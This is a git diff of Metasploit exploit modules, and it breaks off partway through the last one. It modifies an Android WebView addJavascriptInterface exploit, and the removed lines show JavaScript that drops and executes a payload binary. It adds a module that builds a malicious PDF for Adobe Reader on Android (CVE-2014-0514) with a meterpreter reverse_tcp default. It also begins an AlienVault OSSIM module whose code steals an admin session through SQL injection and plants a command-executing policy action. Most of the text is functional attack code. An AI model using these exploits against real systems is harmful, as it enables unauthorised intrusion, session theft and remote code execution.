+    arch          = req.qstring['arch']
+    response_opts = { 'Content-type' => 'text/javascript' }
+
+    if arch.present?
+      print_status("Serving javascript for arch #{normalize_arch arch}")
+      send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts)
+    else
+      print_status("Serving arch detection javascript")
+      send_response(cli, static_arch_detect_js, response_opts)
+    end
+  end
+
+  # This is served to requests for the static .js file.
+  # Because we have to use javascript to detect arch, we have 3 different
+  # versions of the static .js file (x86/mips/arm) to choose from. This
+  # small snippet of js detects the arch and requests the correct file.
+  def static_arch_detect_js
     %Q|
-      function exec(obj) {
-        // ensure that the object contains a native interface
-        try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
+      var arches = {};
+      arches['#{ARCH_ARMLE}']  = /arm/i;
+      arches['#{ARCH_MIPSLE}'] = /mips/i;
+      arches['#{ARCH_X86}']    = /x86/i;
 
-        // get the runtime so we can exec
-        var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
-        var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
-
-        // get the process name, which will give us our data path
-        var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
-        var ch, path = '/data/data/';
-        while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
-        path += '/#{Rex::Text.rand_text_alpha(8)}';
-
-        // build the binary, chmod it, and execute it
-        m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
-        m.invoke(null, null).exec(['chmod', '700', path]).waitFor();
-        m.invoke(null, null).exec([path]);
-
-        return true;
+      var arch = null;
+      for (var name in arches) {
+        if (navigator.platform.toString().match(arches[name])) {
+          arch = name;
+          break;
+        }
       }
 
-      for (i in top) { if (exec(top[i]) === true) break; }
+      if (arch) {
+        // load the script with the correct arch
+        var script = document.createElement('script');
+        script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch);
+        script.setAttribute('type', 'text/javascript');
+
+        // ensure body is parsed and we won't be in an uninitialized state
+        setTimeout(function(){
+          var node = document.body \|\| document.head;
+          node.appendChild(script);
+        }, 100);
+      }
     |
   end
 
-  def html
-    "<!doctype html><html><body><script>#{js}</script></body></html>"
+  # @return [String] normalized client architecture
+  def normalize_arch(arch)
+    if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end
+  end
+
+  def html(arch)
+    "<!doctype html><html><body><script>#{add_javascript_interface_exploit_js(arch)}</script></body></html>"
   end
 end
diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb
new file mode 100644
index 0000000000..bae26457c4
--- /dev/null
+++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb
@@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/fileformat'
+require 'msf/core/exploit/pdf'
+require 'msf/core/exploit/android'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::PDF
+  include Msf::Exploit::Android
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Adobe Reader for Android addJavascriptInterface Exploit',
+      'Description'    => %q{
+          Adobe Reader versions less than 11.2.0 exposes insecure native
+          interfaces to untrusted javascript in a PDF. This module embeds the browser
+          exploit from android/webview_addjavascriptinterface into a PDF to get a
+          command shell on vulnerable versions of Reader.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'Yorick Koster', # discoverer
+        'joev' # msf module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-0514' ],
+          [ 'EDB', '32884' ],
+          [ 'OSVDB', '105781' ],
+        ],
+      'Platform'       => 'android',
+      'DefaultOptions' => {
+        'PAYLOAD' => 'android/meterpreter/reverse_tcp'
+      },
+      'Targets'        => [
+        [ 'Android ARM', {
+            'Platform' => 'android',
+            'Arch' => ARCH_ARMLE
+          }
+        ],
+        [ 'Android MIPSLE', {
+            'Platform' => 'android',
+            'Arch' => ARCH_MIPSLE
+          }
+        ],
+        [ 'Android X86', {
+            'Platform' => 'android',
+            'Arch' => ARCH_X86
+          }
+        ]
+      ],
+      'DisclosureDate' => 'Apr 13 2014',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
+    ], self.class)
+  end
+
+  def exploit
+    print_status("Generating Javascript exploit...")
+    js = add_javascript_interface_exploit_js(ARCH_ARMLE)
+    print_status("Creating PDF...")
+    file_create(pdf(js))
+  end
+
+  def trailer(root_obj)
+    id = @xref.keys.max+1
+    "trailer" << eol << "<</Size %d/Root " % id << ioRef(root_obj) << ">>" << eol
+  end
+
+  def add_compressed(n, data)
+    add_object(n, Zlib::Inflate.inflate(Rex::Text.decode_base64(data)))
+  end
+
+  def pdf(js)
+    self.eol = "\x0d"
+    @xref = {}
+    @pdf = header('1.6')
+
+    add_compressed(25, "eJzjtbHRd0wuynfLL8pVMDFQMFAI0vdNLUlMSSxJVDAGc/0Sc1OLFYyNwBz/0pKczDwg3xzMDUhMB7INzcCc4ILMlNQiz7y0fAUjiOrgkqLS5JKQotTUoPz8EgVDiPkhlQWp+s5AC3Ly0+3seAG6CSa9")
+    add_compressed(40, "eJzjtbHRd3HU0PdIzSlTMFAISQMS6Qqa+i5BQAnXvOT8lMy8dCAzwMXNJT8ZJqBgYgpUF2Rnp++Wn1cClPZIdcpXMLYECUKMMjEHs6MSXZIUTCwgikHKM1NzUoqjjcEisXZ2vADEuSJw")
+    add_compressed(3, "eJztV91umzAUfoK8g8UuN2OMIQkWUFWJplUqU7VGam+N7aSs/AmMQvtqvdgj7RVmEpKRNJp2M2kXWAjZ+Hzfd3zO4Uie+D66lflGPQFCMEH3TaxeSokeo1u06iaRVEwwxcKwVpVk2cS/akvGn6UCsdwkeWD8fPthgEQExoMbWVG5kE/Jl9dK3r9+XfHXZ+4J4yqc+C1tszLTZKDN0rymbWAwUcSS6nn3GRlgZ6KeA+O62wCP0R1YFJUErulAblkumM1N7MyIPf0EbAvbyJojm0BMqNU9oB9GONFvvxJr+m35uZfTq8B4UqqkCG23W3NLzKLaIOx5HrJsZNtQW8D6JVeshXn9YU9y4FnKmldJqZIiB92axUWjAsOYgMHoz5WVR6G8NndnNHmRoZaVCJsWugQS/IgpmyrduSY4kqnMZK5qjcMXcVosiv4sl2UXkeUgHic4vaFxBB0D0MVA69CoEMn6ZcmUDHXwHWi5kOAVtil2qD3VS2pZPjqzPONY6ApScsBBdhyEEpe6+KNlHzkGlud+9AX5V54MbS/5UlSrokjDfcFd86qImQJYx23gRW8zgAtO10WVMRWyskwTzrrC6CLno99bp/YqUenQhUNlXafq9OthI026TNGU5ZvAaKGQa9akygi/16ZqlY/2NmeM6D3lzqVzdX9XOHRZ8KYrsJtl2DSJoJ6Yu1NPSjhbizl0nJhBj885nErXtl3iejFzd4E5xb7jvclrxXIuD7wOn1nONNaZcjwCPcuJIXNdGwqOZ3ObxySO8YF3gB3w6tjSu6oQDZdVeMjTg4zBgpWq0T1in7MTs8kwKIM/eN8eUN8fdGtCx970LhX/ZIwio8goMoqMIqPIKPJfiQxuNzLXV5ptd3fRs/7u8wtzq37r")
+    add_compressed(32, "eJzjtbHR93QJVjA0VzBQCNIPDfIBsi1AbDs7XgBc3QYo")
+    add_compressed(7, "eJzjtbHRd84vzStRMNJ3yywqLlGwUDBQCNL3SYQzQyoLUvX9S0tyMvNSi+3seAF54Q8a")
+    add_compressed(16, "eJzjtbHRd84vzStRMNT3zkwpjjYyUzBQCIrVD6ksSNUPSExPLbaz4wUA0/wLJA==")
+    add_compressed(22, "eJzjtbHRD1Mw1DMytbPjBQARcgJ6")
+    add_compressed(10, "eJzjtbHRd85JLC72TSxQMDRUMFAI0vdWMDQCMwISi1LzSkKKUlMVDI3RRPxSK0q8UysVDPVDKgtS9YNLikqTwRJB+fkldna8AIaCG78=")
+    add_compressed(11, "eJzjtbHRDy5IKXIsKgGy/PXDU5OcEwtKSotS7YCAFwCW+AmR")
+    add_compressed(12, "eJzjtbHR91YwNFUwUAjSD1AwNAAzgvVd8pNLc1PzSuzseAGGCwiD")
+    add_compressed(13, "eJzjtbHR9yvNLY42UDA0UTBQCIq1s+MFADohBRA=")
+    add_compressed(14, "eJzjjTY0VTBQCFKAULG8ABzfA0M=")
+    add_compressed(15, "eJzjtbHRd9YPLkgpciwq0feONlAwjNUPUDA0UjBQCNIPSFcwMgOzgvWB8pnJOal2drwAYtsNjA==")
+    add_compressed(26, "eJx1jk0KwkAMhU/QO+QEnRmnrQiloBXEhVBaV4qLoQ0iyGSYH9Dbm7ZrAwn54L2XZHUt9tZSDFAokNCLlmxEy1wWK3tyB/rcZS5h7kpteG53PB/i5Ck50KvyfARdLtsFp5f5a+puoHIpOuP5DqhqsfQYKPkRAz/U0pv84MyIMwwStJ41DZfoKZqIIMUQfRrjGhKYr1+HnPnEpsl+Bag7pA==")
+    add_compressed(41, "eJzjjTa2UDBQCIrlBQAKzAIA")
+    add_compressed(54, "eJwBzwAw/w08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDE1ND4+c3RyZWFtDUiJXE7BDcIwFLv3K/IFvlatYzAG66bgYSDM2/BQa6cDXWV7gv69m7d5SEISCKGs57axjpEklDFbd/MX1GQCc3jgRMaEN2oNDSVHrMeoep358/SgXQjse9Dx5w722naW29AhTU2RQ2zLkSivJNwABQyuE0pitYGO1SLSiJbxJL0XjaDpibv76UiZ7wvI+cx/rWb1V4ABAMukNiwNZW5kc3RyZWFtDcyfYBU=")
+    add_compressed(34, "eJzjtbHRdw5WMDZTMFAI0g/WDylKzCsuSCxKzUuutLPjBQB75gjK")
+    add_compressed(35, "eJzj1ZA6peCnxVrNzHD3v1xSmdpmTV4AOosGFg==")
+    add_compressed(33, "eJzjjdb3dHZ2SixOTVEwslQwUAiK5QUANnUE/Q==")
+    add_compressed(29, "eJwBEQHu/g08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDIxNi9OIDE+PnN0cmVhbQ1IiWJgYJzh6OLkyiTAwJCbV1LkHuQYGREZpcB+noGNgZkBDBKTiwscAwJ8QOy8/LxUBgzw7RoDI4i+rAsyC1MeL2BNLigqAdIHgNgoJbU4GUh/AeLM8pICoDhjApAtkpQNZoPUiWSHBDkD2R1ANl9JagVIjME5v6CyKDM9o0TB0NLSUsExJT8pVSG4srgkNbdYwTMvOb+oIL8osSQ1BagWagcI8LsXJVYquCfm5iYqGOkZkehyIgAoLCGszyHgMGIUO48QQ4Dk0qIyKJORyZiBASDAAEnGOC8NZW5kc3RyZWFtDYkear8=")
+    add_compressed(36, "eJzjjdb3dHZ2SixOTVEwNlAwUAiK5QUANj4E9Q==")
+    add_compressed(30, "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")
+    add_compressed(38, "eJxNjbEOgjAYhJ+Ad/hHWPgplIoJaVIwaGIwRGsciAtYCFGLQx18e1vi4HDDXe6+8/IcBdAEIjiiaKw7QEqc4xw3wsedKmYgMcjBhmOAFVCsJBZGYzUAS9OEYb23u2LbkjCCn65YCr98TP0dnipA2QCxwAZitjwdVW/ayFajkBGasQwYIWGSUVitY7c+vTvzeSm8TLdRGZR+Z/SCqx3t/I92NaH1bDj3vvt1NZc=")
+    add_compressed(43, "eJzjtbHR9wpWMDFTMFAI0g/W90osSwxOLsosKLGz4wUAaC0Hzw==")
+    add_compressed(51, "eJxNjtEKgkAQRb9g/mG/wHHRTEF8kPCpyDIoEB/UJivQrXUF+/t2Y4seLnPhzj1ciGNMUzGXruMyo4Bzxwt9tozMXVSYCdkfXg9iHNc0dOrKAh83tZK3ueS2ZPTnK9zTKCbZ0qjxuRRtQarEfJVVSYLF1CjN+4DRkPG0be7UqiQZlaS6B8460CC7xQu/YziTBBd46gfOAjeyYRj9wiMMsAMazpb0BnLmPE4=")
+
+    js = Zlib::Deflate.deflate(js)
+    add_object(46, "\x0d<</Filter[/FlateDecode]/Length #{js.length}>>stream\x0d#{js}\x0dendstream\x0d")
+
+    add_compressed(8, "eJzjtbHRd84vzStRMNR3yywqLlGwVDBQCNL3SYQzAxKLUoHy5mBOSGZJTqqGT35yYo6CS2ZxtqadHS8AmCkTkg==")
+    add_compressed(9, "eJzjtbHRd0ktLok2MlMwUAjSj4iMAtLmlkYKeaU5ObH6AYlFqXklChZgyWBXBUNTMCsksyQnVePff4YshmIGPYYShgqGEk07O14AWScVgw==")
+    add_compressed(17, "eJzjtbHR90vMTS2ONjZVMFAIUjAyAFGxdna8AF4CBlg=")
+    add_compressed(18, "eJzjtbHR90vMTS2ONrRUMFAIUjAyAFGxdna8AF4gBlo=")
+    add_compressed(19, "eJzj1UjLzEm10tfXd67RL0nNLdDPKtYrqSjR5AUAaRoIEQ==")
+    add_compressed(20, "eJzjtbHRdw7RKEmtKNEvyEnMzNPU93RRMDZVMFAI0vePNjIDMWL1g/WDA4DYU8HIECwTovHvP0MWQzGDHkMJQwVDiaZ+SLCGi5WRgaGJgbGxoaGhsampUZSmnR0vAOIUGEU=")
+    add_compressed(21, "eJzjtbHRdwxVMLRUMFAI0g8J1nCxMjIwNDEwNjY0NDQ2NTWK0rSz4wUAmbEH3g==")
+    add_compressed(39, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HXKz0nRd81Lzk/JzEtXMDFVMFAI0vdLzE0FqnHK1w8uTSqpLEjVDwEShmBSH2SAnR0vACeXGlQ=")
+    add_compressed(47, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HfNS85PycxLVzAxVTBQCNL3S8xNBUvrB5cmlVQWpOqHAAlDMKkP0mtnxwsAqd8Y1w==")
+    add_compressed(48, "eJzjtbHRd0osTnXLzyvRj0osSHPJzEtPSiwp1vdLzE0Firgk6QeXJpVUFqTqhwAJQzCpD1JuZ8cLAJhsFTA=")
+    add_compressed(45, "eJxNk81u2zAMx5+g75AnGJe0yFKgKGB0PgQYlsOaQzfswEi0LUSWUn1ky55+tJiovkQm+f+RFMXcPT3BV9N1FMgpir9WD3AIdCZQGLwDZYLKY2fpL2ifUClyCYbsegx5tJgT+N47OkIwrodkrKbF/SO8Z58ossvS4nENfcAzLZarDRyytZRAY99TuB76YIGsNadoItCoMQ5Arhyd9ZwYuoAqGW6nz8aWtJa69GEF0w8JRuNyhBOFNPgc0Wlpg9MfMFI1CnozhCzWh3/mLOkLngJqGjEcoTPcF3yLdupw18IPGdWbNjzE6Q4/xcEDsxSjAStSTxAl8q8ci+X6M7Q5eP54AJXD9AQXNtb8BP5I7oCBrQ3UxMqfLtKcD7ojvrBxPNcvK7C+Nwqt8wk+8Y+mDgL1JvJlSMOIqjREfSCCk81RZpX++Jh5YMYHSAPHqoUqJ4IxL5abeyg+PT19yaZIG2sR+N2rnvsZMapsS0ObzRR8zxiYmD4HtJ1UuDrjYvm4gqYsBjRSrZktW1NWCZp69aYsWNPCy618K3ArcDuD20ptRbMVzXam2VZNmwb4LuV2It+JfDeT766CSo3ZJnOyF9jJ4+4F3Qu6n6H7yrxJ8HXwgVeZwsg7erARUFiUMM5YlLJYU2AZA/Lf8zYGEpgEphlMlTKiMaIxM42pGuIxOCnnRe5F7mdyfxVUSpuzmRwyhCxgFjDPwFyJiwRTGcLl5v4Nr5cTv6JTnNv1z893/wElCbzZ")
+    add_compressed(23, "eJxNzLEKgzAQgOEn8B2ymVCqd4npUEQQXQsdCp0Tc4Ol9Ep6Qh+/gg7d/+8v2rYeMgWZ+TUGIT2eLWADziE65z0ewJYApdkqzrpPHEn1U+YYRCFWYOoLp3/sV2yxsacj+A1fM6dlolXv7k5RDeEtS6b9cZvlSfrxqeQrpuuKH+VYK70=")
+
+    @xref_offset = @pdf.length
+    @pdf << xref_table << trailer(25) << startxref
+
+    @pdf
+  end
+
+end
diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb
index b8fa872f5c..db1b49a3fe 100644
--- a/modules/exploits/linux/ftp/proftp_sreplace.rb
+++ b/modules/exploits/linux/ftp/proftp_sreplace.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Evgeny Legerov <admin [at] gleg.net>',  # original .pm version (VulnDisco)
+          'Evgeny Legerov <admin[at]gleg.net>',  # original .pm version (VulnDisco)
           'jduck'   # Metasploit 3.x port
         ],
       'References'     =>
diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb
new file mode 100644
index 0000000000..502fa8126b
--- /dev/null
+++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb
@@ -0,0 +1,356 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "AlienVault OSSIM SQL Injection and Remote Code Execution",
+      'Description'    => %q{
+        This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault
+        OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an
+        active admin session ID.  If an administrator level user is identified, remote code execution
+        can be gained by creating a high priority policy with an action containing our payload.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Sasha Zivojinovic', # SQLi discovery
+          'xistence <xistence[at]0x90.nl>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['OSVDB', '106252'],
+          ['EDB', '33006']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL'      => true,
+          'WfsDelay' => 10
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'RequiredCmd' => 'generic perl python',
+            }
+        },
+      'Targets'        =>
+        [
+          ['Alienvault OSSIM 4.3', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Apr 24 2014",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(443),
+          OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
+        ], self.class)
+  end
+
+
+  def check
+    marker = rand_text_alpha(6)
+    sqli_rand = rand_text_numeric(4+rand(4))
+    sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "
+    sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
+      'vars_get' => { 'date_from' => sqli }
+    })
+
+    if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root
+      return Exploit::CheckCode::Vulnerable
+    else
+      print_status("#{res.body}")
+      return Exploit::CheckCode::Safe
+    end
+
+  end
+
+
+  def exploit
+    marker = rand_text_alpha(6)
+    sqli_rand = rand_text_numeric(4+rand(4))
+    sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "
+    sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
+
+    print_status("#{peer} - Trying to grab admin session through SQLi")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
+      'vars_get' => { 'date_from' => sqli }
+    })
+
+    if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
+      admin_session = $1
+      @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
+      print_status("#{peer} - Admin session cookie is [ #{@cookie} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")
+    end
+
+    # Creating an Action containing our payload, which will be executed by any event (not only alarms)
+    action = rand_text_alpha(8+(rand(8)))
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, "ossim", "action", "modifyactions.php"),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'action' => 'new',
+        'action_name' => action,
+        'descr' => action,
+        'action_type' => '2',
+        'only' => 'on',
+        'cond' => 'True',
+        'exec_command' => payload.encoded
+      }
+    })
+
+    if res && res.code == 200
+      print_status("#{peer} - Created Action [ #{action} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Action creation failed!")
+    end
+
+    # Retrieving the Action ID, used to clean up the action after successful exploitation
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'page' => '1',
+        'rp'   => '2000'
+      }
+    })
+
+    if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
+      @action_id = $1
+      print_status("#{peer} - Action ID is [ #{@action_id} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")
+    end
+
+    # Retrieving the policy data, necessary for proper cleanup after succesful exploitation
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
+      'cookie' => @cookie,
+      'vars_get' => {
+        'm_opt' => 'configuration',
+        'sm_opt' => 'threat_intelligence',
+        'h_opt' => 'policy'
+      }
+    })
+
+    if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
+      policy_ctx = $1
+      policy_group = $2
+      print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")
+    end
+
+    # Creating policy which will be triggered by any source/destination
+    policy = rand_text_alpha(8+(rand(8)))
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'descr' => policy,
+        'active' => '1',
+        'group' => policy_group,
+        'ctx' => policy_ctx,
+        'order' => '1', # Makes this the first policy, overruling all the other policies
+        'action' => 'new',
+        'sources[]' => '00000000000000000000000000000000', # Source is ANY
+        'dests[]' => '00000000000000000000000000000000', # Destination is ANY
+        'portsrc[]' => '0', # Any source port
+        'portdst[]' => '0', # Any destination port
+        'plug_type' => '1', # Taxonomy
+        'plugins[0]' => 'on',
+        'taxfilters[]' =>'20@13@118', # Product Type: Operating System, Category: Application, Subcategory: Web - Not Found
+        'tax_pt' => '0',
